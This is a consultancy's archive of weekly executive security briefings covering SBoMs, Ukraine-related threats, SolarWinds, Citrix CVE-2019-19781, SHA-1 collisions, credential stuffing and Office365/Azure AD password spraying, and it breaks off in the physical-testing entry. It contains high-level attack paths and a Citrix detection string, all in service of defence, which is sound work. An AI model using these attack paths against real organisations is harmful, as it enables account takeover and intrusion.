InGuardians Weekly Executive Briefing

Sign up for our once per week free executive information security briefing.  Concisely written executive summary of the one topic that our team has identified as top priority.
* indicates required
Email Marketing Powered by Mailchimp


3/1/22 Building a Software Bill of Materials for key business applications

Building a Software Bill of Materials for key business applications


At the end of 2021, we saw the release of a remote code execution Log4Shell exploit, which targeted a newly-discovered critical vulnerability in the Log4j library. Hundreds of thousands of commercial and Open Source programs use Log4j to provide logging capabilities for Java. While the vulnerability is severe, the lack of knowledge of which programs use Log4j proved devastating. Organizations struggled to determine what information systems required patching, due to a severe lack of component inventory in their software. This component inventory can be provided via Software Bills of Materials (SBoMs).


When organizations don’t realize their running software contains vulnerable components, they cannot patch this software – this leads to the compromise of systems.


For software distributors, SBoMs are helpful for informing your customers on the components used in your software development efforts.  Not all of us are in the business of distributing software, though. SBoMs can have uses outside of just providing information to your customers.

For many years, the Information Security industry has repeated the need for accurate network device inventory as a basic component of defense in-depth techniques. Since you can’t defend what you don’t know about, you need to go discover your network.

SBoMs are the next evolution of understanding what is on your network so that you can accurately defend it.  This knowledge gained from SBoMs can lead to more accurate patching, more tailored monitoring with specific attack detection rules for specific implementations, and detailed access restrictions (layer 3 network firewalls, host-based restrictions, and enhanced endpoint protection rules) for attacks should patches not be available.

Implementing SBoMs as a network defender can be effective with appropriate interaction or development:

1, When available, ask your vendors to provide SBoMs.

2. Not all vendors will have SBoMs available.  If possible, interview your vendors to create your own SBoMs for internal use.

3. If your organization creates software for internal use, insist that your developers create SBoMs and keep them updated.

4. If your organization utilizes open source software that lacks SBoMs, build SBoMs for your own internal use and consider contributing them to the upstream open source project.

Watch for the evolution of SBoM standards and tools. One initiative that shows a great deal of promise is GitBOM, an open source initiative driven by employees of Microsoft and Cisco, for achieving the most critical component of SBOM via a novel and simple mechanism.

Additional Resources


SBoM Resources from the National Telecommunications and Information Administration

2/1/22 Prepare for Fallout from Escalating Cyber Warfare


Prepare for Fallout from Escalating Cyber Warfare 



The developing situation in Ukraine has multiple state and non-state actors working to further destabilize the region.  Large-scale cyber attacks are already in play.  Government agencies and pundits are warning of the downstream effects of these attacks.



Organizations based in Ukraine or who do business in Ukraine may find themselves directly targeted by cyberattacks during this tumultuous period.  Furthermore, if the United States or NATO intercedes directly in the Ukraine-Russia situation, organizations outside Ukraine may be subject to retaliatory attacks. 


InGuardians has established three primary categories of organizations which may be directly impacted by these events:

  • Organizations based in, or with operations located in, Ukraine.
  • Organizations in the US or Europe responsible for providing critical infrastructure, such as:
    • Healthcare
    • Transportation
    • Power
    • Water
    • Food production and/or distribution
  • Organizations directly supporting Ukraine, US, or NATO governmental agencies.

While the above categories encompass organizations InGuardians believe may be directly targeted by Russian cyberattacks, all organizations should prepare carefully and assume they may be the target of a potential attack. As evidenced by the NotPetya malware outbreak in 2017, which has been attributed to a Russian cyberattack against Ukraine, it is possible that any organization may be impacted unintentionally by nation-state cyber attacks. 


These attacks could result in Denial-of-Service conditions but may escalate to attacks against critical infrastructures, such as healthcare, transportation, power, water, and food processing/distribution. While denial of service attacks can impact business operations, the real risk presented is that of attacks against critical infrastructure.


In addition to the above, InGuardians believes that the current situation is also ripe for false flag operations.  Attribution for cyber attacks is rife with problems, and often sources are manipulated to fit the narrative of the attackers.



InGuardians recommends that organizations based in Ukraine, or who have operations within Ukraine, should increase monitoring efforts, particularly on Ukraine-based infrastructure and network connections to and from Ukraine, including VPN tunnels. Consider increasing SOC staffing until the situation has calmed. Consider temporarily severing unnecessary network connections to Ukraine, ideally minimizing the impact of potential attacks. Finally, consider evaluating trust boundaries for such locations. 


InGuardians furthermore recommends that all organizations, regardless of whether they fall into one of the at-risk categories previously described, undertake the following actions: 

  • Ensure that all Incident Response and Business Continuity Plans are up to date and that copies are available to all relevant staff. Physical copies of such plans should be distributed to key staff in the event that digital copies are unavailable.
  • Review information systems backup procedures – are they doing what you think they are doing? Review system restoration plans – when was the last time they were tested?
  • Consider conducting immediate tabletop exercises and/or supplemental training focused on potential outcomes of Russian cyber attacks. 
  • Ensure that all critical systems have been recently backed up. Consider storing backup copies in secure facilities in physically disparate regions, and consider testing backups by performing full restore-from-backup tests on a subsample of critical systems. 
  • Remind all staff of the dangers of social engineering attacks. Provide examples of possible attacks, discuss how users should respond to such attacks, and reiterate the importance of reporting such attacks as soon as they are identified, particularly if staff “fall for” the attack. 
  • If directly reliant on third-party services directly connected to network resources, increase monitoring of these services. It is possible that organizations may be exposed to attack through services they rely upon. 
  • Consider setting up “honeytokens” in your environment, to get notified about any suspicious activity within your networks, databases, etc. A simple solution would be Canary Tokens
  • Ensure that AV signatures are up to date and software is patched. 
    • Be sure to evaluate patches in a test environment before distributing them across the organization. Supply chain software attacks may render some patches unsafe during this time, requiring additional rigor during patch testing. 
  • Monitor outbound traffic for Ukraine and Russian destinations, in order to determine whether your organization is being used to attack either country.

Additional Resources


CISA Advisory


ABC News – DHS warns of Russian cyberattack on US if it responds to Ukraine invasion


President Biden remarks in Press Confere

12/16/20 Solarwinds Supply Chain Attack Leads To Large-scale Exploitation

Solarwinds Supply Chain Attack Leads To Large-scale Exploitation
Solarwinds Orion monitoring software was compromised with a backdoor between May and June of this year, 2020.
About SolarWinds and SunBurst

SolarWinds Orion Network Management Solution (NMS) has come under scrutiny as being the initial vector of attack for APT29/Cozy Bear, with specific compromises discovered in several US government agencies and one public sector cyber security company, FireEye.  While much of the information is not yet clear about whether or not these were attacks against specific targets is not yet clear, it is possible to surmise that approximately 18,000 to 33,000 possible SolarWinds customers could be affected.

SunBurst is the name given to the backdoor inserted to core functionality of the SolarWinds Orion NMS code management system. SunBurst is a Command and Control (C2) method, allowing full control of the SolarWinds Orion platform and underlying operating system.   This probable compromise of the internal build or distribution system subsequently downloaded the backdoor to platform customers via automatic updates.  This is of particular concern as often NMS installations have ties to monitor and configure a wide range of other technology components within an organization, including Windows Active Directory, credential management, network configuration, firewall management, and network intrusion detection. This could allow an attacker to modify any of these systems, cover their tracks, and evade detection across all of the platforms managed by the NMS.

In addition, as these types of systems often require broad ranges of access, typical strategies to segment or restrict traffic may prove ineffective controls against this vector of attack.

Specifically, SolarWinds customers should perform the following steps:
  • Identify whether or not you are running the Orion NMS platform.
  • Verify whether or not your organization has opted into the sharing of debug information from the Orion platform back to Solarwinds.  If no determination can be made, one should assume that debug information sharing is enabled and that the platform is compromised.
  • Compare the SHA256/SHA1/MD5 hashes of “SolarWinds.Orion.Core.BusinessLayer.dll” to known ‘bad’ versions to determine compromise. If the version(s) present on theone’s current implementation does not match known versions, consider uploading to various online analysis services. If known bad versions are discovered, the organization should implement their Incident Response plan immediately in order to assess risk and next steps.
  • Investigate collected logs to determine if systems on the enterprise network have contacted domains known to be associated with SunBurst C2 servers. If affirmative, the organization should implement their Incident Response plan immediately in order to begin containing and eradicating the compromise.

Overall recommendations, include the adoption of strict egress firewall rules to prevent the NMS from reaching out to any host on the internet.  If internet access is required for product updates, internet access should only be available for the limited time of that upgrade action.  Additionally increased monitoring should be enacted, with the FireEye YARA rules (linked below) as a base, noting that subsequent attacks will evolve.

Non-SolarWinds Orion customers should consider implementing the overall recommendations for any other NMS that may be in use.

If you need assistance in determining whether or not you’ve been compromised or are vulnerable to this attack, contact us at or call +1.202.448.8958

Additional Resources
SolarWinds Security Advisory

YARA rules to detect sunburst

Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor

Customer Guidance on Recent Nation-State Cyber Attacks

Broad Cyber Espionage Campaign Follows Supply Chain Attack on SolarWinds

3/11/20 Coronavirus-Themed Attacks on the Rise

Coronavirus Themed Attacks on the Rise

As the Wuhan Coronavirus (COVID-19) continues to get news cycles and spreads across the globe at an alarming rate, so are COVID-19-themed attacks. Phishing campaigns with malicious PDFs that are masquerading as COVID-19 fact sheets and tips for cleaning are on the rise. These PDFs are droppers that make a connection to remote command and control servers and implant the endpoint with malware. Another attack has a link that directs a user to login to a website, which then redirects them to a valid CDC site on tips for the COVID-19 virus. This attack attempts to steal the user’s credential for further attacks.

With the COVID-19 virus gaining traction in the public mind, phishing attacks and social engineering attacks preying on users are on the rise. The risk of compromise is increased due to the sheer number of phishing attempts and new tactics that might not get caught by current security controls.

InGuardians recommend that end users are given extra reminders and training surrounding phishing and social engineering attacks. InGuardians also recommends following signature updates closely, to more quickly push signatures to your security products.

Additional Resources
Article from threat post

Article from Wall street journal

Article from VOX:

2/13/20 Coronavirus: now is a good time to revisit your Business Continuity Plan.

Coronavirus: now is a good time to revisit your Business Continuity Plan

With the novel coronavirus (2019-nCOV) threatening to spread beyond Chinese containment efforts, now is a good time to examine your organization’s Business Continuity Plan (BCP).

During an emergency, one of the first things InGuardians recommends is identifying reliable sources of information.  Many news sites are guilty of writing headlines to sell news, rather than simply reporting on new information.

In the case of the coronavirus outbreak, InGuardians recommends obtaining information and updates from the World Health Organization (WHO) and the Center for Disease Control (CDC). These two organizations are reliable and maintain up to date information about the spread of the virus, as well as pertinent prevention steps.  As new sources of information are evaluated, we recommend checking them against the WHO and CDC for accuracy and veracity.

The WHO has declared 2019-nCOV a global health emergency.  This is short of a pandemic, but still should warrant careful consideration, with emergency measures put in place.

The second issue to address is how, if at all, your business needs to change in order to keep your personnel and customers safe during continued business operations.

Beyond the hype and fear that epidemics of this magnitude and severity usually prompt, it is imperative that your organization focus on conducting business.  Below is a sampling of questions to help answer how much your business may have to change if this epidemic continues to bloom.

•    How much of your business requires travel?
•    Does your business require products or services originating in the affected areas?
•    Which critical business operations can be conducted remotely?
•    Do your personnel have computing resources and VPN access to be able to work remotely?
•    Do your business data centers have the necessary bandwidth, VPN capacity and such to handle a larger percentage of staff working remotely?

Establish an official communication channel
This is key during a crisis, as rumor mills tend to spread miscommunication faster than it can be undone.  Establish an official communication channel, that allows senior management to communicate swiftly and effectively to all employees as well as particular groups.  E-mail may be most effective, reinforced by official internal company resources, like blog, company internal portal, and video message.

Communicating often and clearly will help quell the rumor mill.  This will also empower your employees to do good research and make their own decisions about their own safety and that of their families.

Enable staff to work remotely
Work with your IT staff to determine what your current capacity is for remote workers.  Consider the possibility of over 80% of your workforce may be working from home.

Determine whether the employees that could work remotely have the computing requirements to do so.  Do they have laptops, internet access, and current VPN credentials? How many have tested and verified their VPN access recently?

Limit unnecessary travel
Examine the next three months of travel and consider making alternate plans.  Plan on avoiding air travel and large gatherings.  Consider isolating individuals who must travel, particularly those who will attend conferences, in order to keep your personnel and clients safe.

Identify essential staff positions and create backups for each critical role
Identify roles that are critical to your business operations.  Once key staff are identified, create backups to that role if they were to become unable to perform that task.  In our company we look for critical roles that have a “bus factor” of 1, finding alternate staff members who can execute those critical roles in case the primary employee can no longer do so.

Establish Crisis Management Teams
Many organizations overlook Crisis Management Teams (CMTs) for handling emergency situations.  Establish these Crisis Management Teams ahead of time.  Much like Incident Responders, CMT’s are critical during a crisis.  The CMT is responsible to make critical decisions and disseminate their results, such as when and whether to shelter in place during an active shooter incident or when to work remotely during a health emergency.

Additional Resources
“What does the coronavirus mean for your business continuity plan?” (Infotech)

Best practices how to create an effective business continuity plan (CIO)

Write your business continuity plan (Cleverism)

2/5/20 Bad internal communications are bad security.

Bad internal communications are bad security.
The United Nations failed to patch Microsoft SharePoint services, but then made it worse. The UN didn’t patch SharePoint, got mega-hacked, covered it up, kept most staff in the dark, finally forced to admit it. The United Nations’ European headquarters in Geneva and Vienna were hacked last summer, putting thousands of staff records at miscreants’ fingertips.

The hack was a result of ineffective patch management procedures and exposed multiple servers. The external security group brought in had to proceed on the assumption that the entire domain was compromised. As bad as that was, the breach was made worse by failing to inform the organization. No damage assessment was possible, no internal changes to address exposure or risk, and apparently no information passed to relevant management and leadership levels. This is not simply a UN issue. InGuardians frequently deals with similarly flawed internal communications in clients. We consider it a finding when we find a break-down in communications among internal staff, from IT security to management. Sometimes it is not recognizing that other groups need to be aware of risks, sometimes it is a failure to transmit internal security policies to users. Broad industry experience suggests security challenges are everywhere and that it is not if you will be hacked but when. Keeping a security event a secret may be tempting for those directly involved but such secrets are rarely sustainable and always make eventual clean-up harder.

Review organization-wide policies for patching, security event monitoring, and security reporting. All are critically important to the overall management of any data environment. After review, actually practice the internal reporting mechanisms to see if people understand the policies. A simple table-top or paper exercise: “Suspected data compromise of file xxx.docx on server yyyyy.”  Handed to a member of the network security staff could start a drill. Note times, methods of discovery, who communicates to whom. Remember security is never a static exercise and is constantly evolving to meet the needs of the organization and data environment.

Additional Resources
UN didn’t patch SharePoint, got mega-hacked, covered it up, kept most staff in the dark, finally forced to admit it

1/27/20 Windows certificate spoofing vulnerability

Windows certificate spoofing vulnerability

On January 14, 2020, Microsoft released a patch for Windows 8.1, 10, and Server 2016, addressing a flaw allowing anyone to bypass the normal process to validate digital certificates that use Elliptic Curve Cryptography (ECC). This happens because Windows fails to validate that the ECC parameters provided match published standard values and instead accepts offered values that differ from the standard but produce a final result that matches the expected result.

Digital certificates can be used to secure HTTPS connections, digitally sign executable files, or sign email messages. ECC is one of two common approaches to produce these certificates, the other being RSA. Certificate spoofing is an attack that allows an attacker to pretend to be a known, trusted entity.

A malicious agent could use this vulnerability to spoof a trusted certificate. They could then potentially intercept encrypted HTTPS connections to view or modify them; distribute applications with malicious code that pass validation; or alter digitally signed email in a way undetectable to an unpatched Windows installation.

Web proxy servers running on Windows are in an especially dangerous position, as they could be fooled into accepting malicious connections. If they trust a malicious certificate, the attacker can view or modify any traffic for client systems sending their web traffic through the proxy even if the clients are patched, because the clients trust the proxy. Most enterprise web proxies run on Linux- or BSD-based operating systems, but some smaller or legacy proxies may run on Windows.

While the released patches cover only officially supported versions of Windows, it is possible, perhaps likely, that all versions of Windows that support ECC are vulnerable. This may include Windows Vista and 7, as well as Server 2008 and 2008R2, all of which are no longer supported by Microsoft. Patches for those operating systems may be available through Microsoft’s Extended Security Update program, but this has cost requirements.

It should be noted that this issue is unrelated to last week’s discussion of the SHA-mbles attack against the SHA-1 hash algorithm, which is a general attack against the algorithm and not any specific operating system.

Installing the patch is the only known means of addressing this vulnerability at the time of this publication. While Microsoft originally rated this patch as “Important,” it admitted that it did so because it had not yet seen any public exploitation of the flaw. Other bodies such as the NSA, DHS, and CERT-US took a more aggressive approach, recommending that the patch be installed as soon as possible on all systems, with critical assets and those acting as proxies for other systems made a priority. A proof of concept was developed within a few days of the patch release, so exploit paths do exist in the wild.

Additional Resources
Microsoft Windows CryptoAPI Spoofing Vulnerability,

NSA Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers,

CVE 2020-0601,

1/16/20 New attack against SHA-1 algorithm allows practical document forgery

New attack against SHA-1 algorithm allows practical document forgery

In January 2020, researchers released a new attack against the SHA-1 hash algorithm that greatly reduces the cost to find a collision. The researchers demonstrated how this attack, named “SHA-mbles,” can forge a PGP encryption key. This same attack threatens DNSSEC and OpenSSL.  This attack appears to have a direct impact on software supply chain security, as the git source management protocol uses a variation of SHA-1. It could also be used to forge digitally-signed documents, such as contracts, altering the terms of the agreement.

A hash algorithm uses mathematical functions on an input value to produce an output value that should be statistically unique from any other input value, avoiding a collision. A collision happens when two different input values produce the same output value, something that should not occur even if one could spend billions of years looking for one. Bad actors can use collisions to falsify file contents for purposes of fraud or theft. If the hash of the fraudulent file matches expectations for the real file, it may be accepted, even though its contents differ. The researchers use the example of a rental agreement digitally signed with SHA-1, where a malicious actor (renter or landlord) produces an agreement with different terms more amenable to that actor. It becomes much more difficult to determine who holds the real agreement.

This is not the first attack against SHA-1. NIST has considered it weak since 2011. The first practical attack, known as SHAttered, arrived in early 2017. That attack could generate two files with identical SHA-1 hashes, resulting in the ability to present a modified document as the original and have the hash-based signatures match. That attack had a projected cost in the ballpark of $500,000.

The SHA-mbles attack dramatically cuts the cost  of creating a matching file to between $11,000 and  $45,000 in a cloud computing environment, depending on certain elements.

Even at $45,000, this is considered a practical attack; a  successful forgery may cost their victim millions of dollars. Also, historical trends indicate that attacks only get easier and cheaper over time. Attacks against SHA-1 became ten times cheaper over three years; in the next few years, they  should be even less expensive, potentially requiring nothing more than powerful desktop hardware. This will make forgeries of documents signed with SHA-1 even more attractive.

InGuardians recommends that organizations update or harden the software  described in the researcher’s site, including: GPG, DNSSEC and OpenSSL.

There is no way to patch or update SHA-1 itself to defend against this. The only solution is to use a different hash algorithm, such as the SHA-2 or SHA-3 family, neither of which has any known significant weaknesses.

Web browsers stopped trusting SHA-1 on HTTPS certificates in 2017. Other software may still use and trust SHA-1. Some may eventually choose to stop trusting it, which may impact internal processes. It is important to get ahead of this.

It may be difficult to identify all cases where the SHA-1 hash is used. In addition to digital file signatures, it is sometimes used to store password representations in web applications; to validate DNS record responses when using DNSSEC; and, of course, for generating some PGP keys. Developers and vendors should be directed to identify where they might use SHA-1 and to replace it with modern algorithms. Password storage should instead use algorithms like Argon2id, which are designed to be heavily resistant to multiple attack vectors.

Additional Resources
Last week’s attack: SHA-1 is a Shambles

SHAttered attack:

1/7/20 Corporations and Individuals Amongst Iran Cyber Targets

Corporations and Individuals Amongst Iran Cyber Targets

As geopolitical tensions rise, it’s important to remember that today’s threat landscape for corporations includes nation-state attacks.  Ever since the Stuxnet malware damaged Iran’s nuclear program, the country’s government has been building cyber warfare capabilities. Iran has a history of targeting corporations and individuals, whenever those targets were viewed as hostile to the country or controlled assets that would be useful in a cyber attack.

Iran has been implicated in attempts to infiltrate the email of government officials and journalists. The country has also taken aim at critical infrastructures, such as a dam in the city of Rye, New York and the oil production of Saudi Aramco. Iran has also targeted American companies, like when it attacked Sheldon Adelson’s casinos after Adelson made public comments that were opposed to Iran.

In the case of the Rye, New York dam, Iran was able to gain access to and control over much of the dam’s industrial control systems but fortunately could not impact the gate that controls the water level, as that system was off-line for maintenance at the time.

With Saudi Aramco, Iran was able to wipe out 35,000 Microsoft Windows computers after a phishing campaign. This occurred during the holiday of Eid, effectively shutting down oil production for weeks. It caused Aramco to disconnect from the internet.

Finally, after Sheldon Adelson made political comments opposed to Iran in 2013, Iran targeted his casinos in Las Vegas with malware, destroying roughly 75% of the servers that ran his casinos. This generated a cost of repair of over $40 million. A year passed before US intelligence officials declared that Iran was behind the attack.

Additional Resources
Any organization involved with critical infrastructures, such as utilities or power generation facilities, should be on high alert.  These organizations are always highly-valued targets for attackers; however, now is a good time to renew the commitment to monitoring and searching for evidence of threats within those organizations.

All executives of major American corporations should be reminded to view themselves as targets of phishing campaigns and other potential attacks from nation-states.

Finally, all organizations with a digital footprint, no matter the industry, should view themselves as either a target of opportunity or a target of choice during times of tensions in the geopolitical landscape. It is important to remain vigilant and to periodically renew this sense of vigilance to ensure that all digital assets are as secure as possible from these types of attacks.

InGuardians Events & Resources
Article from Yahoo Finance regarding the attack on Sheldon Adelson:

Article from The New York Times regarding the Aramco attack:

Article from Time regarding the attack on the dam in Rye, NY\

12/31/19 Critical Citrix Vulnerability

Critical Citrix Vulnerability

A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway.  If exploited, this vulnerability could allow an unauthenticated attacker to perform arbitrary code execution.  Currently, there is a workaround, but at the time of this writing, a firmware update has not yet been released.

The impact of this vulnerability is quite high, with an estimated 80,000 companies scrambling to apply the mitigation whilst awaiting Citrix to release a firmware upgrade.  Any remote code execution (RCE) vulnerability is a concern.

The current advisory and publicly released information are only exposing an unauthenticated file upload capability.  The current unauthenticated upload capability has some challenges with the format in which the files end up on the NetScaler filesystem, but additional research is still being conducted.  A publicly available RCE has not yet been released as of this writing, as additional work needs to be done, through experimentation using the current knowledge.

However, this CVE has been noted as being an RCE condition, indicating that it is possible to conduct the attacks given enough knowledge.  In this scenario, should RCE be successful, complete compromise of the NetScalar device from the internet is possible.  It would then be conceivable for the NetScalar device to be leveraged to attack additional infrastructure, including those that it is connected to as a part of it’s configuration; internal applications, directory providers (AD), and third party resources are all within range for exploitation and full compromise.

Currently, no patch is available from Citrix, yet there are several things that can be accomplished in the meantime:

1.    Implement the workaround as advised by Citrix as an interim solution before an official patch is released.
2.    Perform additional monitoring, and detection for HTTP/HTTPS POST requests to NetScalar platforms looking for the “/vpns/” string used for the initial compromise indicators, in combination with observing for unusual behavior from the NetScalar Devices
3.    Closely monitor additional releases on CVE-2019-19781, and apply patches from Citrix immediately upon release.

Additional Resources

Mitre: CVE-2019-19781

Citrix: Mitigation Steps for CVE-2019-19781

Citrix: CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Internet Storm Center: Some Thoughts About the Critical Citrix ADC/Gateway Vulnerability (CVE-2019-19781)

12/24/19 Ransomware: Recovery is Critical

Ransomware: Recovery is Critical

Recent weeks have left us several reports of state, local and regional governments that have been “held hostage” by ransomware infections.  Though disheartening,  the reports show that there has been some progress in maintaining operations during ransomware attacks:

•    The City of New Orleans: While only a few departments were affected, some were advised to shut down and disconnect from the network for extended periods of time while the attack was mitigated.  The attack was deemed serious enough for the city to activate its Emergency Operations Center.  No ransom was paid.

•    Hackensack Meridian Health:  IT operations were suspended “across the board” for nearly 5 days, ultimately affecting patient care through the cancellation of approximately 100 elective surgical procedures. Recovery was conducted by paying the ransomware authors to release the systems, with the fees ultimately covered by the health care entity’s cyber insurance.

•    The Town of East Greenwich, RI: IT administrators noticed problems early on and shut down the affected systems, preventing any additional compromises.  For those systems that were affected, good previously-tested backups existed.  Data was restored and operations resumed within two business days.  No ransom was paid.

A recent report from the Emsisoft Malware Lab counted ransomware incidents for 2019 at 759 healthcare providers and 103 state and municipal governments and agencies. While these reports have been from government and healthcare entities, it is likely that large numbers of enterprises have been affected, but many are not required by law to report.

In the cases identified here, most had an outage in operations for an extended period of time. This outage resulted in financial losses, disruption in services and potential life safety issues.  Many organizations still need to adopt the mentality of “it is not if we get compromised, but when”. With this mindset, attack and compromise is an eventuality, but the response to that attack is key to a quick recovery.

In the case of the Town of East Greenwich, the town clearly had a very robust recovery plan, and well-established processes and procedures in the case of an outage or attack, which preserved business continuity.  While their active prevention may have been limited and detection and knowledge of attacks were good, the recovery was spectacular.

In this case, InGuardians recommends developing, exercising, and testing a response and recovery plan. Specifically in the case of ransomware, being able to restore systems and data to a known good state is key to recovery without the need to pay ransoms.  Some ways in which this can be accomplished are:

•    Backups: refine a backup plan to cover all of your essential data, even if it is decentralized;  however, this makes the backup plan increase in scope and cost.  These backups should be severalfold: one set online and readily available in the local environment, another online and readily available on a remote secured network, and a third in an offline, non-connected capability with established SLA for retrieval.

•    Easily-rebuilt devices: With a standardized endpoint and server-class of devices across an organization, a “gold image” can be created/updated and easily deployed aiding in faster recovery.

•    Root cause analysis: After the restoration of services, the analysis should be performed to determine the initial attack vector, and revisions to security controls should be implemented in order to prevent similar or additional attacks.

Additional Resources
Hackensack Meridian Health network confirms ransomware attack last week

New Bedford city computers targeted in ransomware attack

New Orleans city government under cyberattack; workers told to turn off, unplug computers

Hackers hit Pensacola with ransomware attack one day after air station shooting

Rhode Island Town Successfully Fights Ransomware Attack

New Bedford city computers targeted in ransomware attack

12/17/19 The Rise of IoT: The gift that keeps on giving

The Rise of IoT: The gift that keeps on giving

In the last few years we, as an industry, have seen a massive uptick in the adoption of internet connected devices.  These devices are often collectively referred to the Internet Of Things (IoT), and are quite popular on the home consumer market.  However, there is an increasing trend of adoption of enterprise-grade IoT gear or the use of consumer-grade gear in the enterprise.  Overall, the adoption of these technologies is seen as a benefit for productivity, physical security, or convenience.
While the perceived benefits are in most cases true, from an IT security perspective we should consider these devices carefully.  In this new market, we find that IoT devices often suffer from one or more of the following issues:
Lack of processing power on the IoT device itself hinders the application of robust IT security controls.
The need to support a consumer base with a variety of skill levels with limited customer support options often results in the adoption of a “lowest common denominator” of lackluster security implementations (default passwords, HTTP, etc).
A rush to market for a new product or service often limits IT security implementation.
Patching and automatic updates have few management options that are suitable for enterprise deployment.
Cloud based services managed by the IoT provider often fall outside of enterprise security practices.

Increased focus by attackers on IoT has shown us attacks against many of the identified shortcomings of overall IoT security postures.   While each potential compromise can have different outcomes, as the variety of IoT implementations can vary, however, some outcomes should be considered:

Compromise of enterprise IoT, resulting in complete compromise of the organization.
Public notification of a breach through IoT devices, resulting in loss of faith in the organization.
Compromise of staff IoT environment, creating a pivot point to remote enterprise resources.

As we move into the new year, our recommendations are threefold:

  1. Consider the creation and implementation of policy in your organization to address the increased use of IoT.  This policy should balance the overall benefit versus the overall risk should the device and associated cloud services become compromised.
  2. Perform discovery and testing internally to the organization in order to detect previously deployed IoT devices, and plan to address any IT security risks with the IoT implementations.
  3. Perform education of staff at large about the risks of IoT technology in their homes and how it can affect the enterprise.  Offer them advice on selecting platforms, how to respond to identified threats, and advice on performing the Principle of Least Privilege should they choose to adopt IoT devices.

Additional Resources
Why Ring Doorbells Perfectly Exemplify the IoT Security Crisis (Wired)

Your Smart Christmas Lights Are Safer Than They Were Last Year (Threatpost)

Consumers not willing to compromise when it comes to IoT security (Help Net Security)

12/9/19 Credential Stuffing: The Finger Points Both Ways

Credential Stuffing: The Finger Points Both Ways

On November 12th The Walt Disney Company opened up their Disney+ streaming service to the public for use.  While the release had some performance-related issues at the initial launch, the streaming service’s launch also kicked off a tremendous amount of account theft.  Within a few days of launch, it was reported that over 100,000 accounts were available for sale on the “dark web”.  Users reported that bad actors had compromised their newly-created accounts, changed their passwords, and taken the users’ control away; in some cases, the compromised accounts were pre-paid for one to three years.

Reports from various media outlets indicate that the accounts became compromised via three methods: prior user device compromise via keystroke loggers, prior user device compromise with credential-stealing malware, and credential stuffing.  While the first two methods were a result of a prior compromise of a user device, the credential stuffing attacks were direct attacks against the service itself.

In a credential stuffing attack, the bad actor acquires previously disclosed credentials from other compromised sites/services and tries these same username-password pairs against a target like Disney+.  Unfortunately, this technique generally proves quite effective, as many people use the same password across multiple sites and services.  When a bad actor compromises a site, they will sometimes publish all credentials found.  According to a report released earlier this year, the first six months of 2019 had nearly 4,000 breaches, resulting in over 4.1 billion sets of credentials published to the internet.

In the case of credential stuffing attacks, successful application of stolen credentials can result in a full compromise of the affected account.  Depending on the nature of the service being compromised, it can result in a financial loss for the user, disruption of service for the user, and ultimately financial losses and loss of faith for the service provider.  The Disney+ case appears to have contained all three of these effects.

While credential stuffing is typically seen as an account compromise for “other” services in use by staff in your organization, many fail to identify that their own services may be subject to the same attacks.  Every organization can fall prey to this kind of attack. There’s even greater risk when the username is an e-mail address or where the user can define their own username. In these cases, both password and username re-use rates increase dramatically.

InGuardians recommends that organizations should attempt credential stuffing attacks, using the same publicly-available compromised credential lists that bad actors use, in order to reveal password reuse in the organization.

These tests can reveal which users have reused passwords within your application, allowing for password changes and user education.  Additional password strength review may also be in order, in conjunction with a revised password policy.  Overall the best solution would be to enable and require multi-factor authentication for the affected application.

In addition to testing to see if credential stuffing is successful against your systems and applications, InGuardians recommends setting up monitoring software to detect credential stuffing attacks.

Additional Resources
Thousands of hacked Disney+ accounts are already for sale on hacking forums

Data Breaches Expose 4.1 Billion Records In First Six Months Of 2019 (Forbes) 

11/12/19 Is Office365 Exposing Your Active Directory?

Is Office365 Exposing Your Active Directory?
Over the course of numerous assessments with a variety of organizations, InGuardians found that Microsoft’s Office365 suite of products might have improper permissions or settings on the supporting infrastructure. In order for an organization to use all of Office365’s bells and whistles while using internal domain credentials for Outlook online and any other connected application, a supporting infrastructure of Azure Active Directory must be created.

Two methods may be used to support this login feature; synchronizing the internal, on-premises Active Directory environment to Azure Active Directory, or utilize Active Directory Federated Services to forward requests to the internal Active Directory environment. Both login methods are exposed to the world from the internet behind authentication to an Azure Active Directory environment.

InGuardians has exploited this configuration many times. This frequency is complicated by the fact that these services allow attackers to:

1.    Engage in password-based attacks against Active Directory without directly touching the enterprise network.
2.    With valid credentials, enumerate Active Directory domains, users, groups, and group memberships.
3.    Continue spraying, guessing, or reusing passwords for a targeted list of users in specific groups such as Domain Admins, Azure Admins, Office365 Admins, and/or VPN/Remote Access.

With this information, if Multi-Factor Authentication (MFA) is not enabled on services that provide access to internal resources such as VPN or Citrix, a malicious actor can make the jump from outside of the network to resources on the internal network, and possibly even code execution, all with little to no effort other than gathering a list of users and finding a weak password.

InGuardians has used this method to gain internal network on assessments and if default configuration pieces are left in place the attack  is trivial. An attacker could use these services to conduct password sprays against publicly available email accounts for weak passwords, and if found, pull a full list of users, groups and group members. The attacker can then use that list to spray for weak passwords, and potentially gain internal network access.

InGuardians recommends that your organization:
•    Disable PowerShell and portal access to Azure Active Directory to users who do not need the access.
•    Align the Azure Active Directory and Office365 password lockout duration with the internal network
•    Use MFA on Office365 and all externally facing resources
•    Monitor and alert for and on failed login attempts to Azure Active Directory; which may require specific licensing.
•    Review Organizational Units that can be view by/synced with Azure Active Directory

Additional Resources
Block user access to Azure AD PowerShell and Graph API Explorer – O365blog

Step-by-Step Guide to Restrict Azure AD Administration portal – RebelAdmin

What are the default user permissions in Azure Active Directory? – Microsoft

Securing Microsoft Active Directory Federation Server (ADFS) – ADsecurity

Azure Active Directory User (Organization Unit) Sync Filtering – Microsoft

11/7/19 Executive Considerations for Physical Security Testing

Executive Considerations for Physical Security Testing

A series of misunderstandings led to the arrest of two Coalfire consultants during a physical penetration test commissioned by their client, the Iowa State Judicial Branch. Several officers had already cleared the consultants, who possessed documented permission and explanation of their actions. It was the elected County Sheriff who demanded the arrests.

Physical security is an essential element of Information Security. Every Information Security consultancy performs this work with a commitment to the security and safety of their employees, as well as their clients’ property and personnel.


Physical penetration test: Testing physical security through physical, digital, and social engineering methods.
Physical security assessment: Walkthrough evaluation of physical security controls and audit measures.
Provider: Information security consulting firm
Client: Organization commissioning the test

